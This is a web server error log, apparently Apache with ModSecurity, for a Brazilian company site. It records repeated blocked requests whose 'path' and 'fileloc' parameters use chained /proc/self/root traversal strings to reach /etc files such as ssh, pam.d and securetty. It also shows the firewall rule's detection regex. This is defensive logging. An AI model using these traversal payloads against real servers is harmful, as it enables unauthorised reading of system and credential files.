https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:35:45.188013 2026] [:error] [pid 11167:tid 140411632822016] [client 74.7.241.31:40986] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzqwfHIg5MgXLBnicPKHgAAAc0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:35:46.517333 2026] [:error] [pid 11167:tid 140411624429312] [client 74.7.241.31:40990] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzqwvHIg5MgXLBnicPKHwAAAc4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:35:48.575666 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.243.128:34800] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzqxOoXxyEfFpUF8f9SGgAAAUI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:35:49.877585 2026] [:error] [pid 31215:tid 140411557287680] [client 74.7.241.31:34914] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzqxQF0L0L-SsrnPo42GAAAAtY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:35:49.908314 2026] [:error] [pid 7893:tid 140411565680384] [client 74.7.243.128:35692] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzqxRCii7xarUs8iHYyGAAAAhU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:35:51.161439 2026] [:error] [pid 15826:tid 140411641214720] [client 74.7.241.31:34928] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzqx-oXxyEfFpUF8f9SGwAAAUw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:35:51.195436 2026] [:error] [pid 15826:tid 140411616036608] [client 74.7.243.128:35700] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzqx-oXxyEfFpUF8f9SHAAAAU8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:35:56.011198 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.243.128:35714] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzqzNa6ubjKNq_cu4aceQAAA0Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:35:57.435778 2026] [:error] [pid 31215:tid 140411590858496] [client 74.7.243.128:35722] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzqzQF0L0L-SsrnPo42IAAAAtI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:35:58.729179 2026] [:error] [pid 11167:tid 140411658000128] [client 74.7.243.128:35730] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzqzvHIg5MgXLBnicPKIQAAAco"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:35:58.740796 2026] [:error] [pid 21219:tid 140411565680384] [client 74.7.241.31:34936] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzqzvXLqtnMIWvjpaJnJwAAApU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:36:00.027824 2026] [:error] [pid 7235:tid 140411540502272] [client 74.7.243.128:32804] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/securetty"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzq0PqxLDW4GITHUkSwLwAAARg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:36:01.355190 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.243.128:32816] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/hosts.allow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzq0eoXxyEfFpUF8f9SJwAAAU4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:36:02.435794 2026] [:error] [pid 7235:tid 140411599251200] [client 74.7.241.31:53138] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzq0vqxLDW4GITHUkSwMgAAARE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:36:02.885302 2026] [:error] [pid 31215:tid 140411733534464] [client 74.7.243.128:32822] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum.conf.bkp-21-10-22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzq0gF0L0L-SsrnPo42IwAAAsE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:36:04.953184 2026] [:error] [pid 7893:tid 140411632822016] [client 74.7.243.128:32830] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzq1BCii7xarUs8iHYyHwAAAg0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:36:04.963440 2026] [:error] [pid 7235:tid 140411574073088] [client 74.7.241.31:53146] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzq0_qxLDW4GITHUkSwNQAAARQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:36:06.406235 2026] [:error] [pid 10189:tid 140411725141760] [client 74.7.243.128:32846] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzq1jJ3M9BSuKP7CAbd_QAAAII"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:36:15.691808 2026] [:error] [pid 31215:tid 140411674785536] [client 74.7.241.31:53158] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzq3wF0L0L-SsrnPo42LwAAAsg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:36:17.005128 2026] [:error] [pid 10189:tid 140411699963648] [client 74.7.241.31:40432] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzq4TJ3M9BSuKP7CAbeDAAAAIU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:36:18.331174 2026] [:error] [pid 11642:tid 140411548894976] [client 74.7.241.31:60416] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzq4rninkcc-iUj5AosIgAAA5c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
